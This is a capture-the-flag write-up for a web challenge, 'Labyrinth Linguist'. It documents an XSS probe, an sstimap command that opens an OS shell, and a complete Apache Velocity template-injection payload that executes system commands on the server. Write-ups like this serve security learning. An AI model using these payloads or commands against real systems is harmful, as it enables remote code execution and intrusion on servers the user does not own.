Labyrinth Linguist

Personal Rating: Medium

We got some sort of translation page for alien language

Wappalyzer detected php

The text is sent via POST request and the shown result is the same text in a different font, which is determined in the style.css

This works, so the website is XSS vulnerable

<script>alert("test")</script>

I tried to inject special chars, but only % returns the example text and < returns nothing. It does not look like its vulnerable to a simple SQL or OS cmd injection

In the server files we can see that the server uses Springboot and Velocity. The following command worked to get an os shell via Velocity SSTI:

python3 sstimap.py -c 5 -d 'text=*' -u http://94.237.62.252:55121/ --os-shell

I inspected the payload that the tools sent with wireshark to find out what the payload looked like.

After some searching, I found this resource: https://iwconnect.com/apache-velocity-server-side-template-injection/

The payload mentioned here, edited for Linux, worked to list the root folder:

#set($s="")
#set($stringClass=$s.getClass())
#set($stringBuilderClass=$stringClass.forName("java.lang.StringBuilder"))
#set($inputStreamClass=$stringClass.forName("java.io.InputStream"))
#set($readerClass=$stringClass.forName("java.io.Reader"))
#set($inputStreamReaderClass=$stringClass.forName("java.io.InputStreamReader"))
#set($bufferedReaderClass=$stringClass.forName("java.io.BufferedReader"))
#set($collectorsClass=$stringClass.forName("java.util.stream.Collectors"))
#set($systemClass=$stringClass.forName("java.lang.System"))
#set($stringBuilderConstructor=$stringBuilderClass.getConstructor())
#set($inputStreamReaderConstructor=$inputStreamReaderClass.getConstructor($inputStreamClass))
#set($bufferedReaderConstructor=$bufferedReaderClass.getConstructor($readerClass))
#set($runtime=$stringClass.forName("java.lang.Runtime").getRuntime())
#set($process=$runtime.exec("ls /"))
#set($null=$process.waitFor() )
#set($inputStream=$process.getInputStream())
#set($inputStreamReader=$inputStreamReaderConstructor.newInstance($inputStream))
#set($bufferedReader=$bufferedReaderConstructor.newInstance($inputStreamReader))
#set($stringBuilder=$stringBuilderConstructor.newInstance())
#set($output=$bufferedReader.lines().collect($collectorsClass.joining($systemClass.lineSeparator())))
$output

I used CyberChef to fully URL encode it and then send it at http://?text=<payload>

PreviousKORP TerminalNextLockTalk

Last updated